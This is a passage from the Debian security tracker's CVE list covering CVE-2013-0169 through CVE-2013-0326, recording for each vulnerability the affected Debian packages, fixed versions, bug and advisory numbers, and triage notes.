jenkins 1.480.3+dfsg-1 (bug #700761) CVE-2013-0326 (OpenStack nova base images permissions are world readable ...) - nova (unimportant) NOTE: Unfixed upstream, typical installation not multi-user anyway CVE-2013-0325 (Multiple cross-site scripting (XSS) vulnerabilities in the Varnish mod ...) NOT-FOR-US: Drupal addon CVE-2013-0324 (Cross-site scripting (XSS) vulnerability in the Rendered links formatt ...) NOT-FOR-US: Drupal addon CVE-2013-0323 (Cross-site scripting (XSS) vulnerability in the Display Suite module 7 ...) NOT-FOR-US: Drupal addon CVE-2013-0322 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart modu ...) NOT-FOR-US: Drupal addon CVE-2013-0321 (Cross-site scripting (XSS) vulnerability in Views in the Ubercart View ...) NOT-FOR-US: Drupal addon CVE-2013-0320 (Cross-site request forgery (CSRF) vulnerability in the Taxonomy Manage ...) NOT-FOR-US: Drupal addon CVE-2013-0319 (Cross-site scripting (XSS) vulnerability in the Yandex.Metrics module ...) NOT-FOR-US: Drupal addon CVE-2013-0318 (The admin page in the Banckle Chat module for Drupal does not properly ...) NOT-FOR-US: Drupal addon CVE-2013-0317 (Cross-site scripting (XSS) vulnerability in the Manager Change for Org ...) NOT-FOR-US: Drupal addon CVE-2013-0316 (The Image module in Drupal 7.x before 7.20 allows remote attackers to ...) - drupal7 7.14-2 (bug #701165) - drupal6 (Only affects Drupal 7) CVE-2013-0315 (The GateIn Portal export/import gadget in JBoss Enterprise Portal Plat ...) NOT-FOR-US: GateIn Portal CVE-2013-0314 (The GateIn Portal export/import gadget in JBoss Enterprise Portal Plat ...) NOT-FOR-US: GateIn Portal CVE-2013-0313 (The evm_update_evmxattr function in security/integrity/evm/evm_crypto. ...) - linux 3.2.39-1 - linux-2.6 (Vulnerable code not present) CVE-2013-0312 (389 Directory Server before 1.3.0.4 allows remote attackers to cause a ...) - 389-ds-base 1.3.0.3-1 CVE-2013-0311 (The translate_desc function in drivers/vhost/vhost.c in the Linux kern ...) - linux 3.2.41-1 - linux-2.6 (Vulnerable code not present) CVE-2013-0310 (The cipso_v4_validate function in net/ipv4/cipso_ipv4.c in the Linux k ...) - linux 3.2.29-1 - linux-2.6 (Vulnerable code not present) CVE-2013-0309 (arch/x86/include/asm/pgtable.h in the Linux kernel before 3.6.2, when ...) - linux 3.2.32-1 - linux-2.6 (THP not in Squeeze) NOTE: Probably gone since 3.2.32, but I checked 3.2.41-2 CVE-2013-0308 (The imap-send command in GIT before 1.8.1.4 does not verify that the s ...) - git (OpenSSL support is not enabled in Debian, see bug #701586) NOTE: http://marc.info/?l=git&m=136134619013145&w=2 NOTE: Further reference about SSL support in imap-send #434599 needs to be adressed first CVE-2013-0307 (Cross-site scripting (XSS) vulnerability in settings.php in ownCloud b ...) - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/ CVE-2013-0306 (The form library in Django 1.3.x before 1.3.6, 1.4.x before 1.4.4, and ...) {DSA-2634-1} - python-django 1.4.4-1 (bug #701186) CVE-2013-0305 (The administrative interface for Django 1.3.x before 1.3.6, 1.4.x befo ...) {DSA-2634-1} - python-django 1.4.4-1 (bug #701186) NOTE: https://www.djangoproject.com/weblog/2013/feb/19/security/ CVE-2013-0304 (ownCloud Server before 4.5.7 does not properly check ownership of cale ...) - owncloud 5.0.3+dfsg-1 CVE-2013-0303 (Unspecified vulnerability in core/ajax/translations.php in ownCloud be ...) - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-006/ CVE-2013-0302 (Unspecified vulnerability in ownCloud Server before 4.0.12 allows remo ...) - owncloud 5.0.3+dfsg-1 CVE-2013-0301 (Cross-site request forgery (CSRF) vulnerability in apps/calendar/ajax/ ...) - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/ CVE-2013-0300 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...) - owncloud (Vulnerably code not present, only affects 4.5 branch) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/ CVE-2013-0299 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...) - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-004/ CVE-2013-0298 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.x ...) - owncloud (Vulnerably code not present, only affects 4.5 branch) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/ CVE-2013-0297 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 4.0.8debian-1.5 (bug #701115) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-003/ CVE-2013-0296 (Race condition in pigz before 2.2.5 uses permissions derived from the ...) - pigz 2.2.4-2 (low; bug #700608) [squeeze] - pigz 2.1.6-1+squeeze1 CVE-2013-0295 REJECTED CVE-2013-0294 (packet.py in pyrad before 2.1 uses weak random numbers to generate RAD ...) - pyrad 2.0-2 (low; bug #700669) [wheezy] - pyrad 1.2-1+deb7u2 [squeeze] - pyrad 1.2-1+deb6u1 CVE-2013-0293 (oVirt Node: Lock screen accepts F2 to drop to shell causing privilege ...) - ovirt-node (bug #502024) CVE-2013-0292 (The dbus_g_proxy_manager_filter function in dbus-gproxy in Dbus-glib b ...) - dbus-glib 0.100.1-1 (bug #700638; high) [squeeze] - dbus-glib 0.88-2.1+squeeze1 CVE-2013-0291 (NextGEN Gallery Plugin for WordPress 1.9.10 and 1.9.11 has a Path Disc ...) NOT-FOR-US: NextGEN Gallery Plugin for WordPress CVE-2013-0290 (The __skb_recv_datagram function in net/core/datagram.c in the Linux k ...) - linux (Introduced in 3.4, fixed in 3.8) - linux-2.6 (Introduced in 3.4) CVE-2013-0289 (Isync 0.4 before 1.0.6, does not verify that the server hostname match ...) - isync 1.0.4-2.2 (low; bug #701052) [squeeze] - isync (Minor issue) NOTE: http://isync.git.sourceforge.net/git/gitweb.cgi?p=isync/isync;a=patch;h=914ede18664980925628a9ed2a73ad05f85aeedb CVE-2013-0288 (nss-pam-ldapd before 0.7.18 and 0.8.x before 0.8.11 allows context-dep ...) {DSA-2628-1} - nss-pam-ldapd 0.8.10-3 (bug #690319) CVE-2013-0287 (The Simple Access Provider in System Security Services Daemon (SSSD) 1 ...) - sssd (Introduced in 1.9.0) NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/12 CVE-2013-0286 (Pinboard 1.0.6 theme for Wordpress has XSS. ...) NOT-FOR-US: Wordpress theme CVE-2013-0285 (The nori gem 2.0.x before 2.0.2, 1.1.x before 1.1.4, and 1.0.x before ...) NOT-FOR-US: nori Ruby gem CVE-2013-0284 (Ruby agent 3.2.0 through 3.5.2 serializes sensitive data when communic ...) NOT-FOR-US: newrelic_rpm Ruby gem CVE-2013-0283 (Katello: Username in Notification page has cross site scripting ...) NOT-FOR-US: Red Hat CloudForms CVE-2013-0282 (OpenStack Keystone Grizzly before 2013.1, Folsom 2012.1.3 and earlier, ...) - keystone 2012.1.1-13 (bug #700947) CVE-2013-0281 (Pacemaker 1.1.10, when remote Cluster Information Base (CIB) configura ...) - pacemaker 1.1.10-1 (low; bug #700923) [squeeze] - pacemaker (Minor issue) [wheezy] - pacemaker (Minor issue) NOTE: https://github.com/ClusterLabs/pacemaker/commit/564f7cc2a51dcd2f28ab12a13394f31be5aa3c93 CVE-2013-0280 REJECTED CVE-2013-0279 REJECTED CVE-2013-0278 REJECTED CVE-2013-0277 (ActiveRecord in Ruby on Rails before 2.3.17 and 3.x before 3.1.0 allow ...) {DSA-2620-1} - ruby-activerecord-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-0276 (ActiveRecord in Ruby on Rails before 2.3.17, 3.1.x before 3.1.11, and ...) {DSA-2620-1} - ruby-activemodel-3.2 3.2.6-3 - ruby-activerecord-2.3 2.3.14-5 - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: The fix for 3.2 is present in ruby-activemodel-3.2, not ruby-activerecord-3.2 CVE-2013-0275 (Multiple cross-site scripting (XSS) vulnerabilities in Ganglia Web bef ...) - ganglia 3.6.0-1 (low; bug #700158) [squeeze] - ganglia (Minor issue) [wheezy] - ganglia (Minor issue) - ganglia-web 3.5.8-3 (bug #700159) NOTE: starting with 3.6.0-1 the web front is no longer built from src:ganglia so marking this version as fixed NOTE: https://github.com/ganglia/ganglia-web/commit/31d348947419058c43b8dfcd062e2988abd5058e NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=892823 CVE-2013-0274 (upnp.c in libpurple in Pidgin before 2.10.7 does not properly terminat ...) - pidgin 2.10.6-3 NOTE: http://www.pidgin.im/news/security/?id=68 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) CVE-2013-0273 (sametime.c in the Sametime protocol plugin in libpurple in Pidgin befo ...) - pidgin 2.10.6-3 [squeeze] - pidgin (Not suitable for code injection) NOTE: http://pidgin.im/news/security/?id=67 CVE-2013-0272 (Buffer overflow in http.c in the MXit protocol plugin in libpurple in ...) - pidgin 2.10.6-3 NOTE: http://pidgin.im/news/security/?id=66 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) CVE-2013-0271 (The MXit protocol plugin in libpurple in Pidgin before 2.10.7 might al ...) - pidgin 2.10.6-3 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) NOTE: http://pidgin.im/news/security/?id=65 CVE-2013-0270 (OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier ...) - keystone 2013.1.1-2 [wheezy] - keystone (Too intrusive to backport) NOTE: https://bugs.launchpad.net/keystone/+bug/1099025 NOTE: See notes on ubuntu security tracker, change too intrusive to be backported CVE-2013-0269 (The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7 ...) {DLA-263-1 DLA-215-1} - ruby-json 1.7.3-3 (bug #700436) - libjson-ruby - ruby1.9.1 1.9.3.194-7 (bug #700471) - ruby1.8 (json ext not present in 1.8) CVE-2013-0268 (The msr_open function in arch/x86/kernel/msr.c in the Linux kernel bef ...) - linux 3.2.39-1 - linux-2.6 2.6.32-48squeeze1 CVE-2013-0267 (The Privileges portion of the web GUI and the XMLRPC API in Apache VCL ...) NOT-FOR-US: Apache VCL CVE-2013-0266 (manifests/base.pp in the puppetlabs-cinder module, as used in PackStac ...) NOT-FOR-US: Openstack Packstack CVE-2013-0265 (The redirect_stderr function in xnbd_common.c in xnbd-server and xndb- ...) - xnbd 0.1.0-pre-hg20-e75b93a47722-3 (low) NOTE: http://seclists.org/oss-sec/2013/q1/248 CVE-2013-0264 (An import error was introduced in Cumin in the code refactoring in r53 ...) NOT-FOR-US: Cumin CVE-2013-0263 (Rack::Session::Cookie in Rack 1.5.x before 1.5.2, 1.4.x before 1.4.5, ...) {DSA-2783-1} - ruby-rack 1.4.1-2.1 (bug #700226) - librack-ruby (bug #700226) NOTE: https://bugzilla.suse.com/show_bug.cgi?id=802794 NOTE: Patches in git, commits 0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07 and 9a81b961457805f6d1a5c275d053068440421e11 CVE-2013-0262 (rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before ...) - ruby-rack 1.4.1-2.1 (bug #700173) - librack-ruby (Introduced in 1.4.0, see #700226) NOTE: Patches in git, commit 6f237e4c9fab649d3750482514f0fde76c56ab30 CVE-2013-0261 ((1) installer/basedefs.py and (2) modules/ospluginutils.py in PackStac ...) NOT-FOR-US: Openstack Packstack CVE-2013-0260 (Unspecified vulnerability in the Drush Debian Packaging module for Dru ...) NOT-FOR-US: Drupal module debuild NOTE: This is a different thing from the drush package. CVE-2013-0259 (Cross-site scripting (XSS) vulnerability in the Boxes module 7.x-1.x b ...) NOT-FOR-US: Drupal module Boxes CVE-2013-0258 (The Google Authenticator login (ga_login) module 7.x before 7.x-1.3 fo ...) NOT-FOR-US: Drupal module ga_login CVE-2013-0257 (The email2image module 6.x-1.x and 6.x-2.x for Drupal does not properl ...) NOT-FOR-US: Drupal module email2image CVE-2013-0256 (darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before 4.0.0.preview2.1 ...) {DLA-235-1} - ruby1.9.1 1.9.3.194-6 (low; bug #699929) - ruby1.8 (Only affects 1.9 and 2.0) NOTE: http://marc.info/?l=oss-security&m=136021623726440&w=2 NOTE: https://github.com/rdoc/rdoc/commit/ffa87887ee0517793df7541629a470e331f9fe60 CVE-2013-0255 (PostgreSQL 9.2.x before 9.2.3, 9.1.x before 9.1.8, 9.0.x before 9.0.12 ...) {DSA-2630-1} - postgresql-9.1 9.1.8-1 - postgresql-8.4 8.4.16-1 CVE-2013-0254 (The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before ...) {DLA-210-1} - qt4-x11 4:4.8.2+dfsg-11 (bug #699870) NOTE: possible follow-up problem if patch is applied: http://bugs.debian.org/700530 NOTE: but bug in xorg server, needs checking CVE-2013-0253 (The default configuration of Apache Maven 3.0.4, when using Maven Wago ...) - wagon2 2.2-3+nmu1 (bug #701991) CVE-2013-0252 (boost::locale::utf::utf_traits in the Boost.Locale library in Boost 1. ...) - boost1.50 (bug #699650) - boost1.49 1.49.0-3.2 (bug #699649) - boost1.42 (Boost.Locale was not part of boost until 1.48.0, bug #699719) CVE-2013-0251 (Stack-based buffer overflow in llogincircuit.cc in latd 1.25 through 1 ...) - latd 1.31 (low; bug #699625) [squeeze] - latd (Minor issue) CVE-2013-0250 (The init_nss_hash function in exec/totemcrypto.c in Corosync 2.0 befor ...) - corosync (Introduced in v1.99.8-2-ge925f42; bug #699615) NOTE: https://github.com/corosync/corosync/commit/4378915a33ab7fbbb5874f79dd7cd71b014ef44e#L0R407 NOTE: https://www.openwall.com/lists/oss-security/2013/02/01/1 CVE-2013-0249 (Stack-based buffer overflow in the Curl_sasl_create_digest_md5_message ...) - curl 7.29.0-1 (bug #700002) [squeeze] - curl (Only affects 7.26.0 to 7.28.1) [wheezy] - curl 7.26.0-1+wheezy1 CVE-2013-0248 (The default configuration of javax.servlet.context.tempdir in Apache C ...) - libcommons-fileupload-java 1.3-1 (unimportant) NOTE: Only affects example code CVE-2013-0247 (OpenStack Keystone Essex 2012.1.3 and earlier, Folsom 2012.2.3 and ear ...) - keystone 2012.1.1-12 (bug #699835) NOTE: https://bugs.launchpad.net/keystone/+bug/1098307 CVE-2013-0246 (The Image module in Drupal 7.x before 7.19, when a private file system ...) - drupal7 7.14-1.3 (bug #698334) NOTE: https://drupal.org/SA-CORE-2013-001 CVE-2013-0245 (The printer friendly version functionality in the Book module in Drupa ...) {DSA-2776-1} - drupal6 (bug #698333) - drupal7 7.14-1.3 (bug #698334) NOTE: https://drupal.org/SA-CORE-2013-001 CVE-2013-0244 (Cross-site scripting (XSS) vulnerability in Drupal 6.x before 6.28 and ...) {DSA-2776-1} - drupal6 (bug #698333) - drupal7 7.14-1.3 (bug #698334) NOTE: https://drupal.org/SA-CORE-2013-001 CVE-2013-0242 (Buffer overflow in the extend_buffers function in the regular expressi ...) {DLA-165-1} - eglibc - glibc 2.17-2 (low; bug #699399) [wheezy] - eglibc 2.13-38+deb7u1 NOTE: http://seclists.org/oss-sec/2013/q1/202 CVE-2013-0241 (The QXL display driver in QXL Virtual GPU 0.1.0 allows local users to ...) - xserver-xorg-video-qxl 0.0.17-1 (bug #699396) [squeeze] - xserver-xorg-video-qxl (minor denial of service issue) NOTE: squeeze is affected since it could be a guest of an affected qemu-kvm version CVE-2013-0240 (Gnome Online Accounts (GOA) 3.4.x, 3.6.x before 3.6.3, and 3.7.x befor ...) - gnome-online-accounts 3.4.2-2 (bug #699825) CVE-2013-0239 (Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, w ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2013-0238 (The try_parse_v4_netmask function in hostmask.c in IRCD-Hybrid before ...) {DSA-2618-1} - ircd-hybrid 1:7.2.2.dfsg.2-10 (bug #699267; high) [squeeze] - ircd-hybrid 7.2.2.dfsg.2-6.2+squeeze1 - oftc-hybrid CVE-2013-0237 (Cross-site scripting (XSS) vulnerability in Plupload.as in Moxiecode p ...) - wordpress 3.5.1+dfsg-1 (bug #698929) NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/ NOTE: https://www.openwall.com/lists/oss-security/2013/01/25/7 CVE-2013-0236 (Multiple cross-site scripting (XSS) vulnerabilities in WordPress befor ...) - wordpress 3.5.1+dfsg-1 (bug #698927) NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/ NOTE: https://www.openwall.com/lists/oss-security/2013/01/25/7 CVE-2013-0235 (The XMLRPC API in WordPress before 3.5.1 allows remote attackers to se ...) - wordpress 3.5.1+dfsg-1 (bug #698916) NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/ NOTE: https://www.openwall.com/lists/oss-security/2013/01/25/7 CVE-2013-0234 (Cross-site scripting (XSS) vulnerability in the Twitter widget in Elgg ...) - elgg (bug #526197) CVE-2013-0233 (Devise gem 2.2.x before 2.2.3, 2.1.x before 2.1.3, 2.0.x before 2.0.5, ...) - ruby-devise 3.4.1-1 CVE-2013-0232 (includes/functions.php in ZoneMinder Video Server 1.24.0, 1.25.0, and ...) {DSA-2640-1} - zoneminder 1.25.0-4 (bug #698910) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=904103 NOTE: Upstream forum post: http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771 CVE-2013-0231 (The pciback_enable_msi function in the PCI backend driver (drivers/xen ...) {DSA-2632-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-0230 (Stack-based buffer overflow in the ExecuteSoapAction function in the S ...) - miniupnpd (Fixed before initial upload to archive) CVE-2013-0229 (The ProcessSSDPRequest function in minissdp.c in the SSDP handler in M ...) - miniupnpd (Fixed before initial upload to archive) CVE-2013-0228 (The xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel ...) {DLA-103-1} - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 NOTE: was actually fixed in 2.6.32-46squeeze1 but upload was done and no DSA was released for that version. CVE-2013-0227 (Cross-site scripting (XSS) vulnerability in the Search API Sorts modul ...) NOT-FOR-US: Drupal addon CVE-2013-0226 (The Keyboard Shortcut Utility module 7.x-1.x before 7.x-1.1 for Drupal ...) NOT-FOR-US: Drupal addon CVE-2013-0225 (Cross-site scripting (XSS) vulnerability in the User Relationships mod ...) NOT-FOR-US: Drupal addon CVE-2013-0224 (The Video module 7.x-2.x before 7.x-2.9 for Drupal, when using the FFm ...) NOT-FOR-US: Drupal addon CVE-2013-0223 (The SUSE coreutils-i18n.patch for GNU coreutils allows context-depende ...) - coreutils (Affected patch not added to Debian package) NOTE: https://www.openwall.com/lists/oss-security/2013/01/21/14 CVE-2013-0222 (The SUSE coreutils-i18n.patch for GNU coreutils allows context-depende ...) - coreutils (Affected patch not added to Debian package) NOTE: https://www.openwall.com/lists/oss-security/2013/01/21/14 CVE-2013-0221 (The SUSE coreutils-i18n.patch for GNU coreutils allows context-depende ...) - coreutils (Affected patch not added to Debian package) NOTE: https://www.openwall.com/lists/oss-security/2013/01/21/14 CVE-2013-0220 (The (1) sss_autofs_cmd_getautomntent and (2) sss_autofs_cmd_getautomnt ...) - sssd 1.8.4-2 (low; bug #698871) [squeeze] - sssd (autofs and ssh responders not yet present) CVE-2013-0219 (System Security Services Daemon (SSSD) before 1.9.4, when (1) creating ...) - sssd 1.8.4-2 (low; bug #698871) [squeeze] - sssd (Minor issue) CVE-2013-0218 (The GUI installer in JBoss Enterprise Application Platform (EAP) and E ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2013-0217 (Memory leak in drivers/net/xen-netback/netback.c in the Xen netback fu ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2013-0216 (The Xen netback functionality in the Linux kernel before 3.7.8 allows ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48 CVE-2013-0215 (oxenstored in Xen 4.1.x, Xen 4.2.x, and xen-unstable does not properly ...) - xen (ocaml version of the xenstore daemon not used in Debian) CVE-2013-0214 (Cross-site request forgery (CSRF) vulnerability in the Samba Web Admin ...) {DSA-2617-1} - samba 2:3.6.6-5 CVE-2013-0213 (The Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3 ...) {DSA-2617-1} - samba 2:3.6.6-5 CVE-2013-0212 (store/swift.py in OpenStack Glance Essex (2012.1), Folsom (2012.2) bef ...) - glance 2012.1.1-4 CVE-2013-0211 (Integer signedness error in the archive_write_zip_data function in arc ...) - libarchive 3.0.4-3 (bug #703957) [squeeze] - libarchive (Vulnerable code not present) CVE-2013-0210 (The smart proxy Puppet run API in Foreman before 1.2.0 allows remote a ...) - foreman (bug #663101) CVE-2013-0209 (lib/MT/Upgrade.pm in mt-upgrade.cgi in Movable Type 4.2x and 4.3x thro ...) {DSA-2611-1} - movabletype-opensource 5.1.2+dfsg-1 (bug #697666) NOTE: Versions 5.0 or higher not affected CVE-2013-0208 (The boot-from-volume feature in OpenStack Compute (Nova) Folsom and Es ...) - nova 2012.1.1-12 CVE-2013-0207 (Cross-site request forgery (CSRF) vulnerability in the Mark Complete m ...) NOT-FOR-US: module for Drupal CVE-2013-0206 (Unrestricted file upload vulnerability in the Live CSS module 6.x-2.x ...) NOT-FOR-US: module for Drupal CVE-2013-0205 (Cross-site request forgery (CSRF) vulnerability in the RESTful Web Ser ...) NOT-FOR-US: module for Drupal CVE-2013-0204 (settings/personal.php in ownCloud 4.5.x before 4.5.6 allows remote aut ...) - owncloud (Vulnerably code not present, only affects 4.5 branch) NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-002/ CVE-2013-0203 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.5, ...) - owncloud 4.0.8debian-1.4 (bug #698737) [wheezy] - owncloud 4.0.4debian2-3.3 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/ CVE-2013-0202 (Cross-site scripting (XSS) vulnerability in ownCloud 4.5.5, 4.0.10, an ...) - owncloud 4.0.8debian-1.4 (bug #698737) [wheezy] - owncloud 4.0.4debian2-3.3 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/ CVE-2013-0201 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.5, ...) - owncloud 4.0.8debian-1.4 (bug #698737) [wheezy] - owncloud 4.0.4debian2-3.3 NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/ CVE-2013-0200 (HP Linux Imaging and Printing (HPLIP) through 3.12.4 allows local user ...) {DSA-2829-1} - hplip 3.12.6-3.1 (low; bug #701185) [squeeze] - hplip (Minor issue) CVE-2013-0199 (The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict acce ...) NOT-FOR-US: FreeIPA CVE-2013-0198 (Dnsmasq before 2.66test2, when used with certain libvirt configuration ...) - dnsmasq 2.66-1 (low) [wheezy] - dnsmasq (Minor issue) [squeeze] - dnsmasq (Minor issue) NOTE: https://www.openwall.com/lists/oss-security/2013/01/18/2 CVE-2013-0197 (Cross-site scripting (XSS) vulnerability in the filter_draw_selection_ ...) - mantis (This only affects the 1.2.12 version, which isn't present in Debian, bug #698481) NOTE: http://www.mantisbt.org/bugs/view.php?id=15373 CVE-2013-0196 (A CSRF issue was found in OpenShift Enterprise 1.2. The web console is ...) NOT-FOR-US: OpenShift CVE-2013-0195 (Cross-site Scripting (XSS) in Piwik before 1.10.1 allows remote attack ...) - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0194 (Cross-site Scripting (XSS) in Piwik before 1.10.1 allows remote attack ...) - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0193 (Cross-site Scripting (XSS) in Piwik before 1.10.1 allows remote attack ...) - piwik (bug #506933) NOTE: http://piwik.org/blog/2013/01/piwik-1-10/ CVE-2013-0192 (File Disclosure in SMF (SimpleMachines Forum) <= 2.0.3: Forum admin ...) NOT-FOR-US: Simple Machines Forum CVE-2013-0188 REJECTED CVE-2013-0190 (The xen_failsafe_callback function in Xen for the Linux kernel 2.6.23 ...) - linux 3.2.39-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2013-0189 (cachemgr.cgi in Squid 3.1.x and 3.2.x, possibly 3.1.22, 3.2.4, and oth ...) {DSA-2631-1} - squid 2.7.STABLE9-2 NOTE: squid-cgi was removed in 2.7.STABLE9-2 - squid3 3.1.20-2.1 (bug #696187) NOTE: possible regression, see #701123 CVE-2013-0191 (libpam-pgsql (aka pam_pgsql) 0.7 does not properly handle a NULL value ...) - pam-pgsql 0.7.3.1-4 (bug #698241) [squeeze] - pam-pgsql 0.7.1-4+squeeze2 NOTE: patch: https://sourceforge.net/u/lvella/pam-pgsql/ci/9361f5970e5dd90a747319995b67c2f73b91448c/ NOTE: bugreport: https://sourceforge.net/p/pam-pgsql/bugs/13/ CVE-2013-0187 (Foreman before 1.1 allows remote authenticated users to gain privilege ...) - foreman (bug #663101) CVE-2013-0186 (Multiple cross-site scripting (XSS) vulnerabilities in ManageIQ EVM al ...) NOT-FOR-US: ManageIQ EVM (CloudForms) CVE-2013-0185 (Cross-site request forgery (CSRF) vulnerability in ManageIQ Enterprise ...) NOT-FOR-US: ManageIQ EVM (CloudForms) CVE-2013-0184 (Unspecified vulnerability in Rack::Auth::AbstractRequest in Rack 1.1.x ...) {DSA-2783-1} - ruby-rack 1.4.1-2.1 (bug #698440) - librack-ruby CVE-2013-0183 (multipart/parser.rb in Rack 1.3.x before 1.3.8 and 1.4.x before 1.4.3 ...) {DSA-2783-1} - ruby-rack 1.4.1-2.1 (bug #698440) - librack-ruby NOTE: commit 24d512531bd88f2d6ce94b3a3d9798fde8fbb713 refactored the multipart module NOTE: and introduced the fast_forward_to_first_boundry function. NOTE: https://github.com/rack/rack/commit/24d512531bd88f2d6ce94b3a3d9798fde8fbb713 CVE-2013-0182 (The Payment module 7.x-1.x before 7.x-1.3 for Drupal does not properly ...) NOT-FOR-US: Drupal module Payment CVE-2013-0181 (Cross-site scripting (XSS) vulnerability in Views in the Search API (s ...) NOT-FOR-US: Drupal module search_api CVE-2013-0180 (Insecure temporary file vulnerability in Redis 2.6 related to /tmp/red ...) - redis 2:2.6.7-1 NOTE: https://www.openwall.com/lists/oss-security/2013/01/14/3 NOTE: Issue introduced to (incorrect) fix the CVE-2013-0178 temporary file issue, NOTE: where the fix introduced a new issue. CVE-2013-0179 (The process_bin_delete function in memcached.c in memcached 1.4.4 and ...) - memcached 1.4.13-0.2 (low; bug #698231) [squeeze] - memcached 1.4.5-1+deb6u1 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=895054 NOTE: https://code.google.com/p/memcached/issues/detail?id=306 NOTE: https://code.google.com/p/memcached/issues/attachmentText?id=306&aid=3060004000&name=0001-Fix-buffer-overrun-when-logging-key-to-delete-in-bin.patch CVE-2013-0178 (Insecure temporary file vulnerability in Redis before 2.6 related to / ...) - redis 2:2.6.0-1 (low) [squeeze] - redis (Minor issue) [wheezy] - redis (Minor issue) NOTE: RedHat bugreport mentions 2.4 is affected, but not 2.6 CVE-2013-0177 (Multiple cross-site scripting (XSS) vulnerabilities in widget/screen/M ...) NOT-FOR-US: OFBiz CVE-2013-0176 (The publickey_from_privatekey function in libssh before 0.5.4, when no ...) - libssh 0.5.4-1 (low; bug #698963) [squeeze] - libssh (Minor issue) NOTE: http://www.libssh.org/2013/01/22/libssh-0-5-4-security-release/ NOTE: http://git.libssh.org/projects/libssh.git/commit/?h=v0-5&id=55b09f426417406bb25c0b9c474fbab1398b0dc8 CVE-2013-0175 (multi_xml gem 0.5.2 for Ruby, as used in Grape before 0.2.6 and possib ...) - ruby-multi-xml (Vulnerable version never in the archive) NOTE: fixed in https://rubygems.org/gems/multi_xml/versions/0.5.2 CVE-2013-0174 (The external node classifier (ENC) API in Foreman before 1.1 allows re ...) - foreman (bug #663101) CVE-2013-0173 (Foreman before 1.1 uses a salt of "foreman" to hash root passwords, wh ...) - foreman (bug #663101) CVE-2013-0172 (Samba 4.0.x before 4.0.1, in certain Active Directory domain-controlle ...) - samba4 4.0.0~beta2+dfsg1-3.1 (high; bug #699188) - samba (Only affects Active Directory functionality) NOTE: https://lists.samba.org/archive/samba-technical/2013-January/089911.html CVE-2013-0171 (Foreman before 1.1 allows remote attackers to execute arbitrary code v ...) - foreman (bug #663101) CVE-2013-0170 (Use-after-free vulnerability in the virNetMessageFree function in rpc/ ...) - libvirt 0.9.12-6 (bug #699224) [squeeze] - libvirt (Vulnerable code not present, see bug #699224) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=893450 NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=46532e3e8ed5f5a736a02f67d6c805492f9ca720 CVE-2013-0169 (The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as use ...) {DSA-2622-1 DSA-2621-1} - openssl 1.0.1e-1 (bug #699889) - bouncycastle 1.48+dfsg-2 (low; bug #699885) [wheezy] - bouncycastle (Minor issue) [squeeze] - bouncycastle (Minor issue) - polarssl 1.1.4-2 (bug #699887) - nss 2:3.14.3-1 (bug #699888) [squeeze] - nss (Minor issue) - openjdk-7 7u3-2.1.6-1 - openjdk-6 6b27-1.12.3-1 - gnutls26 2.12.20-4 [squeeze] - gnutls26 (Too 